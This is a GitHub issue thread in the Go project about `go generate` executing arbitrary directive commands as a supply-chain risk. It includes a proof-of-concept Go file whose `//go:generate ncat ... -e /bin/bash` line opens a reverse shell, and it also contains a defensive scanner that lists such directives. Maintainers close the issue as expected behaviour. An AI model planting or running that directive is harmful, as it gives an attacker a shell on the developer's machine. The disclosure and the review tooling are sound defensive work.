Maybe it's not a bug, it's the expected behavior, but it's the way of RCE(Remote Command Execution) attack in the supply chain #52059

Closed
hktalent opened this issue Mar 31, 2022 · 5 comments

Comments

@hktalent

The go generate command does not conduct a security check. When compiling the associated malicious library and code, it may cause the execution of the "//go:generate [malicious command]".

Impact

1. hacker runs

nc -lv 4444

2. POC

testRce.go

```go
package main

import (
	"fmt"
)

//go:generate ncat 127.0.0.1 4444 -e /bin/bash
func main() {
	fmt.Println("test go:generate remote command execution ")
}
```

3. run build

go generate -x testRce.go

4. test command execution

in "nc -lv 4444" console

Attack scenario:
People who provide golang open source libraries and projects may embed malicious commands, causing users to trigger commands during compilation.
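The directive the report relies on is an ordinary comment, so the defensive counterpart is to list what `go generate` would run before running it. The following is an added example written for this page, not code from the issue or from the Go project: it scans Go source text for `//go:generate` lines using the same recognition rule the go tool applies (marker at column 0, followed by a space or tab), expands `-command` aliases, and returns the commands for review. The `sampleSource` below is a constructed input.

```go
package main

import (
	"bufio"
	"fmt"
	"strings"
)

// Directive is one runnable //go:generate line found in a Go source file.
type Directive struct {
	Line    int
	Command string // the command as go generate would run it, aliases expanded
}

// findGenerateDirectives lists the commands that `go generate` would execute
// for the given source text. It applies the same recognition rule as the go
// tool: the marker must start at column 0 and be followed by a space or tab,
// so an indented "//go:generate" or "//go:generatefoo" is not a directive.
// "-command alias ..." lines define aliases and are expanded, not listed.
// Like the go tool itself, this works on raw lines, so a marker at the start
// of a line inside a raw string literal is reported too.
func findGenerateDirectives(src string) []Directive {
	aliases := map[string][]string{}
	var out []Directive
	sc := bufio.NewScanner(strings.NewReader(src))
	for n := 1; sc.Scan(); n++ {
		line := sc.Text()
		if !strings.HasPrefix(line, "//go:generate ") && !strings.HasPrefix(line, "//go:generate\t") {
			continue
		}
		// Approximation: the go tool also honours quoting; plain field splitting
		// is enough to surface the command for a human reviewer.
		words := strings.Fields(line[len("//go:generate"):])
		if len(words) == 0 {
			continue
		}
		if words[0] == "-command" && len(words) >= 3 {
			aliases[words[1]] = words[2:]
			continue
		}
		if exp, ok := aliases[words[0]]; ok {
			words = append(append([]string{}, exp...), words[1:]...)
		}
		out = append(out, Directive{Line: n, Command: strings.Join(words, " ")})
	}
	return out
}

// sampleSource is a constructed Go file exercising the recognition rules.
const sampleSource = `package main

import "fmt"

//go:generate stringer -type=Pill
//go:generate -command yacc go tool yacc
//go:generate yacc -o gopher.go -p parser gopher.y
  //go:generate this one is indented and therefore ignored
//go:generatefoo also ignored
func main() {
	fmt.Println("hello")
}
`

func main() {
	for _, d := range findGenerateDirectives(sampleSource) {
		fmt.Printf("line %d: %s\n", d.Line, d.Command)
	}
}
```

Running this over a dependency's source before invoking `go generate` gives the reviewer the same list that `go generate -n` prints (the `-n` flag prints the commands without executing them), but without having to trust the build tree to be inert first.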

@hktalent
Author

In any case, with open source libraries flying everywhere, supply chain security has become urgent and needs better mechanisms to ensure it.

@zigo101

zigo101 commented Mar 31, 2022

go generate may run any commands. It is the user's duty to decide whether or not to run go generate.

@hktalent
Author

hktalent commented Mar 31, 2022

@go101 I know, but in the whole ecosystem there are risks.
There are too many open-source projects and complex dependencies. Think carefully about the supply chain attacks that are extremely feared.

@zigo101

zigo101 commented Mar 31, 2022

The go generate command does not conduct security check.

This is an impossible task for go generate.

Do you mean the docs of go generate should mention the risk in a more obvious manner?

Currently, the docs say:

Generate runs commands described by directives within existing
files. Those commands can run any process but the intent is to
create or update Go source files.

Go generate is never run automatically by go build, go test,
and so on. It must be run explicitly.

@mdlayher
Member

See above, it is up to the user to decide when to run go generate. Closing.

@golang golang locked and limited conversation to collaborators Mar 31, 2023